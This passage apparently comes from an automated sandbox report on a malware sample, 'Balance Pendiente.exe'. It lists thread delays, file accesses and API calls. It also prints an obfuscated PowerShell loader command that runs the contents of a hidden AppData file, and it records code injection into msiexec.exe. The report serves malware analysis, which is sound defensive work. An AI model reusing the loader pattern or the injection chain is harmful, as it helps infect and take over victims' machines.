            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 600000
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 599891
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 599766
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 599657
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 599532
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 599422
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 599313
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 599188
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 599063
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 598938
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 598813
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 598703
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 598594
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 598469
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 598360
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 598235
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 598114
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 597985
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 597864
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 597740
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 597610
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 597471
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 597344
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 597235
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 597110
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 596985
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 596860
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 596735
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 596610
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 596485
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 596360
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 596235
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 596110
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 595985
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 595860
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 595735
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 595610
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 595485
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 595353
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 595235
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 595094
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 594978
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 594860
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 594703
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 594594
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 594485
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 594360
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 594235
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 594110
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 593985
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5786
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3915
            Source: C:\Users\user\Desktop\Balance Pendiente.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsu1A01.tmp\nsExec.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2656 | Thread sleep time: -6456360425798339s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1012 | Thread sleep count: 33 > 30
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1012 | Thread sleep time: -30437127721620741s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1012 | Thread sleep time: -600000s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6612 | Thread sleep count: 1151 > 30
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1012 | Thread sleep time: -599891s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6612 | Thread sleep count: 8672 > 30
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1012 | Thread sleep time: -599766s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1012 | Thread sleep time: -599657s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1012 | Thread sleep time: -599532s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1012 | Thread sleep time: -599422s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1012 | Thread sleep time: -599313s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1012 | Thread sleep time: -599188s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1012 | Thread sleep time: -599063s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1012 | Thread sleep time: -598938s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1012 | Thread sleep time: -598813s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1012 | Thread sleep time: -598703s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1012 | Thread sleep time: -598594s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1012 | Thread sleep time: -598469s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1012 | Thread sleep time: -598360s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1012 | Thread sleep time: -598235s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1012 | Thread sleep time: -598114s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1012 | Thread sleep time: -597985s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1012 | Thread sleep time: -597864s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1012 | Thread sleep time: -597740s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1012 | Thread sleep time: -597610s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1012 | Thread sleep time: -597471s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1012 | Thread sleep time: -597344s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1012 | Thread sleep time: -597235s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1012 | Thread sleep time: -597110s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1012 | Thread sleep time: -596985s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1012 | Thread sleep time: -596860s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1012 | Thread sleep time: -596735s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1012 | Thread sleep time: -596610s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1012 | Thread sleep time: -596485s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1012 | Thread sleep time: -596360s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1012 | Thread sleep time: -596235s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1012 | Thread sleep time: -596110s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1012 | Thread sleep time: -595985s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1012 | Thread sleep time: -595860s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1012 | Thread sleep time: -595735s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1012 | Thread sleep time: -595610s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1012Thread sleep time: -595485s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1012Thread sleep time: -595353s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1012Thread sleep time: -595235s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1012Thread sleep time: -595094s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1012Thread sleep time: -594978s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1012Thread sleep time: -594860s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1012Thread sleep time: -594703s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1012Thread sleep time: -594594s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1012Thread sleep time: -594485s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1012Thread sleep time: -594360s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1012Thread sleep time: -594235s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1012Thread sleep time: -594110s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1012Thread sleep time: -593985s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Balance Pendiente.exe Last function: Thread delayed
            Source: C:\Users\user\Desktop\Balance Pendiente.exe Code function: 0_2_00405E6B FindFirstFileA,FindClose, 0_2_00405E6B
            Source: C:\Users\user\Desktop\Balance Pendiente.exe Code function: 0_2_00405427 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose, 0_2_00405427
            Source: C:\Users\user\Desktop\Balance Pendiente.exe Code function: 0_2_00402647 FindFirstFileA, 0_2_00402647
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 600000
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599891
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599766
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599657
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599532
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599422
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599313
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599188
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599063
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598938
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598813
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598703
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598594
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598469
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598360
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598235
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598114
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597985
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597864
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597740
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597610
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597471
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597344
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597235
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597110
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596985
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596860
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596735
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596610
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596485
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596360
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596235
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596110
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595985
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595860
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595735
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595610
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595485
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595353
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595235
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595094
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 594978
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 594860
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 594703
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 594594
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 594485
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 594360
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 594235
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 594110
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 593985
            Source: C:\Users\user\Desktop\Balance Pendiente.exe File opened: C:\Users\user
            Source: C:\Users\user\Desktop\Balance Pendiente.exe File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache
            Source: C:\Users\user\Desktop\Balance Pendiente.exe File opened: C:\Users\user\AppData
            Source: C:\Users\user\Desktop\Balance Pendiente.exe File opened: C:\Users\user\AppData\Local
            Source: C:\Users\user\Desktop\Balance Pendiente.exe File opened: C:\Users\user\AppData\Local\Microsoft\Windows
            Source: C:\Users\user\Desktop\Balance Pendiente.exe File opened: C:\Users\user\AppData\Local\Microsoft
            Source: ModuleAnalysisCache.1.dr Binary or memory string: Remove-NetEventVmNetworkAdapter
            Source: ModuleAnalysisCache.1.dr Binary or memory string: Add-NetEventVmNetworkAdapter
            Source: powershell.exe, 00000001.00000002.2160143305.0000000004FC2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Remove-NetEventVmNetworkAdapter@\dq
            Source: powershell.exe, 00000001.00000002.2160143305.0000000004FC2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Get-NetEventVmNetworkAdapter@\dq
            Source: powershell.exe, 00000001.00000002.2160143305.0000000004FC2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Add-NetEventVmNetworkAdapter@\dq
            Source: msiexec.exe, 00000006.00000002.2981936990.0000000006334000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2981936990.00000000062CA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
            Source: msiexec.exe, 00000006.00000002.2981936990.0000000006334000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW]
            Source: ModuleAnalysisCache.1.dr Binary or memory string: Get-NetEventVmNetworkAdapter
            Source: C:\Users\user\Desktop\Balance Pendiente.exe API call chain: ExitProcess graph end node graph_0-3894
            Source: C:\Users\user\Desktop\Balance Pendiente.exe API call chain: ExitProcess graph end node graph_0-3755
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00ADDAC0 LdrInitializeThunk, 1_2_00ADDAC0
            Source: C:\Users\user\Desktop\Balance Pendiente.exe Code function: 0_2_00405E92 GetModuleHandleA,LoadLibraryA,GetProcAddress, 0_2_00405E92
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
            Source: C:\Windows\SysWOW64\msiexec.exe Process token adjusted: Debug

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exe
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread APC queued: target process: C:\Windows\SysWOW64\msiexec.exe
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\SysWOW64\msiexec.exe base: 4460000
            Source: C:\Users\user\Desktop\Balance Pendiente.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$Bibrd=gc -Raw 'C:\Users\user\AppData\Roaming\Kalkvrksarbejderen84\chego\reverensens\Defmrkede\Crossbeam.Dec122';$Antiodont=$Bibrd.SubString(60335,3);.$Antiodont($Bibrd)"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
            Source: C:\Users\user\Desktop\Balance Pendiente.exe Code function: 0_2_100010D3 GetModuleFileNameA,GlobalAlloc,CharPrevA,GlobalFree,GetTempFileNameA,CopyFileA,CreateFileA,CreateFileMappingA,MapViewOfFile,UnmapViewOfFile,CloseHandle,CloseHandle,CloseHandle,lstrcatA,lstrlenA,GlobalAlloc,FindWindowExA,FindWindowExA,FindWindowExA,lstrcmpiA,DeleteFileA,GlobalAlloc,GlobalLock,GetVersionExA,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreatePipe,CreatePipe,CreatePipe,GetStartupInfoA,CreateProcessA,lstrcpyA,GetTickCount,PeekNamedPipe,GetTickCount,ReadFile,lstrlenA,lstrlenA,lstrlenA,lstrcpynA,lstrlenA,GlobalSize,GlobalUnlock,GlobalReAlloc,GlobalLock,lstrcatA,GlobalSize,lstrlenA,lstrcpyA,CharNextA,GetTickCount,TerminateProcess,lstrcpyA,Sleep,WaitForSingleObject,GetExitCodeProcess,PeekNamedPipe,lstrcpyA,lstrcpyA,wsprintfA,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,DeleteFileA,GlobalFree,GlobalFree,GlobalUnlock,GlobalFree, 0_2_100010D3
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
